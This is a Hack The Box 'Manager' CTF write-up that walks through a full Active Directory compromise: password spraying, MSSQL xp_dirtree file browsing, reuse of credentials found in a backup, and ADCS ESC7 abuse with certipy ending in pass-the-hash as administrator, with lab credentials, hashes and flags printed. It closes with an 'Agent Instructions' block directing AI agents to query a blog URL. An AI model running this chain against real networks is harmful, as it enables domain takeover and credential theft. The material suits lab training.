# HTB - Manager
## Description
Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The `xp_dirtree` procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.
## Enumeration
***
**Nmap Scan**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
49693/tcp open unknown
49782/tcp open unknown
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p53,80,88,135,139,389,445,1433,5985 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 01:37:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-01T19:35:12
|_Not valid after: 2054-11-01T19:35:12
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m01s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
```
**Summary**
```R
* Open ports: 53,80,88,135,139,389,445,1433,5985
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - KERBEROS - RPC - SMB - MSSQL -winRM
* Important notes: Domain: manager.htb - DNS:dc01.manager.htb
```
**hosts file**
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $sudo sh -c "echo '$ip dc01 dc01.manager.htb manager.htb' >> /etc/hosts"
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $tail -n1 /etc/hosts
10.10.11.236 dc01 dc01.manager.htb manager.htb
```
**Service Enumeration**
**HTTP Enumeration**
{% embed url="" %}
I don't get anything new from fuzzing files and directories from those I find in the website
No many things are in this web app as it seems to be a static website, So I will switch to other services running on this box
**SMB & RPC Enumeration**
I don't get anything useful permissions on the shares, but I get the users on the domain using `rid bruting`
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $nxc smb dc01 -u 'guest' -p '' --shares
SMB 10.10.11.236 445 DC01 [+] manager.htb\guest:
SMB 10.10.11.236 445 DC01 [*] Enumerated shares
SMB 10.10.11.236 445 DC01 Share Permissions Remark
SMB 10.10.11.236 445 DC01 ----- ----------- ------
SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.236 445 DC01 C$ Default share
SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.236 445 DC01 NETLOGON Logon server share
SMB 10.10.11.236 445 DC01 SYSVOL Logon server share
```
## Foothold
***
Since I don't have any password yet, I will try to brute the password as the user's name and I get a hit
I can brute `MSSQL` login, too
With valid credentials, I will look at the shared access and MSSQL database. When I looked at the share, I didn't get interesting things here so will move to `mssql`
And I'm in the database :))
When I deal with `mssql`, I perform checklist for possible attack paths, So I will create one
* Check for admin Access
* Check the databases for juicy info and secrets
* Check the possibility capture the `mssql` service account
* Check for impersonating other users
* Check for trustworthy database
* Check for Linked Server
* Check for Read or Write Access to the file system
* Check for executing commands with `xp_cmdshell`
With this List, I can move forward and I will use `mssqlclient.py` built-in commands
```bash
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
-----------
0
SQL (MANAGER\Operator guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
SQL (MANAGER\Operator guest@master)> enum_owner
Database Owner
-------- -----
master sa
tempdb sa
model sa
msdb sa
SQL (MANAGER\Operator guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
--------------- ---------------- ----------- --------------- ------------------ ------------ -------
DC01\SQLEXPRESS SQLNCLI SQL Server DC01\SQLEXPRESS NULL NULL NULL
SQL (MANAGER\Operator guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
```
Till now, I don't get any possible path and when I even tried to get the hash of the service account, I got the hash of the machine account which is uncrackable
The last thing I can try is check read or write access to the file system. I will use `xp_dirtree` to list the directories in a path.
## Lateral Movement
***
With IIS web server running on the box, I can try to read `web.config` or an important file on its directory `inetpub`. Here are several interesting files `web.config` & `website-backup-27-07-23-old.zip`
When I tried to access the `web.config` trough web, it gave me `file not found`.
but when I tried to access the `.zip` file, It was downloaded
I created a new directory, moved the zip file to it, unzipped it and list the content. there is an odd `.xml` file
It contain credential for `raven` user.
```xml
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $cat .old-conf.xml
..snip..
raven@manager.htbR4v3nBe5tD3veloP3r!123
..snip..
```
These credentials are valid and I have access to Winrm, too :))
```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $evil-winrm -i dc01 -u raven -p 'R4v3nBe5tD3veloP3r!123'
*Evil-WinRM* PS C:\Users\Raven\Documents> type ..\Desktop\user.txt
518fbc8e81299098bac6e8654ae731a1
```
> User Flag: 518fbc8e81299098bac6xxxxxxxxxxxxx
## Privilege Escalation
***
Looking at the account `privs` and `groups`, I noticed that he is a member of `Certificate Service DCOM Access` which means PKI existence
I can confirm with `NetExec` using `ADCS` module
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $nxc ldap dc01 -u raven -p 'R4v3nBe5tD3veloP3r!123' -M adcs
LDAP 10.10.11.236 389 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123
ADCS 10.10.11.236 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.236 389 DC01 Found PKI Enrollment Server: dc01.manager.htb
ADCS 10.10.11.236 389 DC01 Found CN: manager-DC01-CA
```
When dealing with ADCS, I hurry to enumerate possible ESCALATION `(ESC)` paths using `certipy`
Then, I will also use `certipy` to find `vunerable` templates or permissions
```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
```
* user `raven` has `Enroll` and `ManageCA` rights which means he can enroll new certificate and edit permission on any template, So I can make it vulnerable to `ESC4`
* The built-in `SubCA` template is also enabled (as it is by default). This template is vulnerable to `ESC1` but only permits `Domain Admins` and `Enterprise Admins` to enroll.
* The certificate is present and enabled (`Enabled: True`). If the `SubCA` certificate is disabled we should enable it.
* Since we have ManageCA rights, we can assign `ManageCertificate` rights to any account.
**Exploitation Path**
1. Enable `SubCA` template
2. Grant `ManageCertificate` rights
3. Request certificate for `SubCA` template impersonating `administrator`
4. Approve the enrollment request as `raven`
5. Access the machine as an administrator
```shell
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -enable-template 'SubCA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
```
Grant `ManageCertificate` rights
```shell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -add-officer raven
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
```
Confirm the new permission
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $ certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -stdout -dc-ip 10.10.11.236
..snip..
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
```
* With the `SubCA` template enabled and with `ManageCertificates` rights, we can request a certificate by adding an alternative `SAN` and selecting the `SubCA` template.
```shell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 20
Would you like to save the private key? (y/N) y
[*] Saved private key to 20.key
[-] Failed to request certificate
```
* We need to save the requested ID `20`, and respond yes to the question: `Would you like to save the private key? (y/N)`. We will need this private key to retrieve the certificate later.
```shell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -issue-request 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -retrieve 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saved certificate and private key to 'administrator.pfx'
```
Now I can authenticate as an administrator with the `.pfx` file
```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy auth -pfx administrator.pfx -domain manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
```
Access the machine
```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $evil-winrm -i dc01 -u administrator -H ae5064c2f62317332c88629e025924ef
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
5fa4f9480b1bba44627e3fcfaf5a08a5
```
> Root Flag: 5fa4f9480b1bba44627exxxxxxxxxxxxxxxx
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://blind0bandit.gitbook.io/blog/windows-machines/medium/htb-manager.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.